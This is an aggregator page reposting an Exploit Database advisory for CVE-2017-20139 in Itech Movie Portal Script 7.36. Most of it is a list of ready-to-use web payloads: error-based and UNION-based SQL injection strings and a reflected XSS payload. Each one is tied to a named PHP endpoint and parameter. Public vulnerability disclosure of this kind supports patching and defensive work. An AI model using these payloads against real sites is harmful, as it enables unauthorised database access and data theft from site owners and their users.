Headline

CVE-2017-20139: Offensive Security’s Exploit Database Archive

A vulnerability was found in Itech Movie Portal Script 7.36. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /show_news.php. The manipulation of the argument id with the input AND (SELECT 1222 FROM(SELECT COUNT(),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) leads to sql injection (Error). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

2 years ago

CVE

Open in Source

#sql #xss #vulnerability #web #google #php #auth

Movie Portal Script 7.36 - Multiple Vulnerabilities

Platform:****PHP

Date:****2017-01-25

Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability
Google Dork :    -
Date : 20/01/2017
Exploit Author : Marc Castejon <[email protected]>
Vendor Homepage : http://itechscripts.com/movie-portal-script/
Software Link: http://movie-portal.itechscripts.com
Type : webapps
Platform: PHP
Sofware Price and Demo : $250

------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_news.php
Vulnerable Parameters: id
Method: GET
Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

-----------------------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/movie.php
Vulnerable Parameters : f=
Payload:<img src=i onerror=prompt(1)>
---------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_misc_video.php
Vulnerable Parameters: id
Method: GET
Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-----------------------------------------------

Type:Union Query Sql Injection
Vulnerable URL:http://localhost/[PATH]/movie.php
Vulnerable Parameters: f
Method: GET
Payload:  -4594 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
-----------------------------------------------
Type: Union Query Sql Injection
Vulnerable URL:http://localhost/[PATH]/artist-display.php
Vulnerable Parameters: act
Method: GET
Payload:  UNION ALL SELECT
NULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
-----------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/film-rating.php
Vulnerable Parameters: v
Method: GET
Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

10 months ago

10 months ago

10 months ago

10 months ago

10 months ago